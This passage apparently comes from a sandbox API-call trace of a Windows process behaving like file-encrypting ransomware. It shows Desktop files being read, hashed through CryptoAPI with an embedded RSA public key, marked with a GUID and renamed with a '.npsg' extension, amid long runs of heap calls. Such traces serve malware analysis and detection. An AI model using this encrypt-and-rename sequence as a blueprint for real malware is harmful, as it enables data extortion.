lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.291] GetCurrentThreadId () returned 0x5b4 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x6885a0 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.292] GetCurrentThreadId () returned 0x5b4 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400110 [0236.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.293] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.293] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.293] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.293] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.293] CloseHandle (hObject=0x644) returned 1 [0236.294] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mQvFbEibR0KeT2 Eo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mqvfbeibr0ket2 eo.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mQvFbEibR0KeT2 Eo.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mqvfbeibr0ket2 eo.m4a.npsg")) returned 1 [0236.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.295] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.297] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15c6e840, ftCreationTime.dwHighDateTime=0x1d5b7ad, ftLastAccessTime.dwLowDateTime=0x2c34470, ftLastAccessTime.dwHighDateTime=0x1d5be45, ftLastWriteTime.dwLowDateTime=0x2c34470, ftLastWriteTime.dwHighDateTime=0x1d5be45, nFileSizeHigh=0x0, nFileSizeLow=0x9ad1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="neTGSd9Wavz2PccQ.bmp", cAlternateFileName="NETGSD~1.BMP")) returned 1 [0236.297] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\neTGSd9Wavz2PccQ.bmp") returned=".bmp" [0236.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\neTGSd9Wavz2PccQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\netgsd9wavz2pccq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.297] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=39633) returned 1 [0236.297] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.300] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9aab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.300] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.302] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x9ad1, lpOverlapped=0x0) returned 1 [0236.303] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.303] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.303] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.303] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.304] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.304] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.305] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.305] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.305] GetLastError () returned 0x0 [0236.305] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.305] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.305] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.305] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.305] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.305] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400128 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400128 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000e0 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34000c8 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400128 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.307] GetCurrentThreadId () returned 0x5b4 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688630 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.307] GetCurrentThreadId () returned 0x5b4 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400128 [0236.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000c8 [0236.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000e0 [0236.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000b0 [0236.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400140 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400110 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000f8 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400158 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000f8 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400110 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000c8 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400128 | out: hHeap=0x620000) returned 1 [0236.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400158 | out: hHeap=0x620000) returned 1 [0236.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400140 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000b0 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95110 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.311] WriteFile (in: hFile=0x644, lpBuffer=0x3b7fcd0*, nNumberOfBytesToWrite=0x9acc, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b7fcd0*, 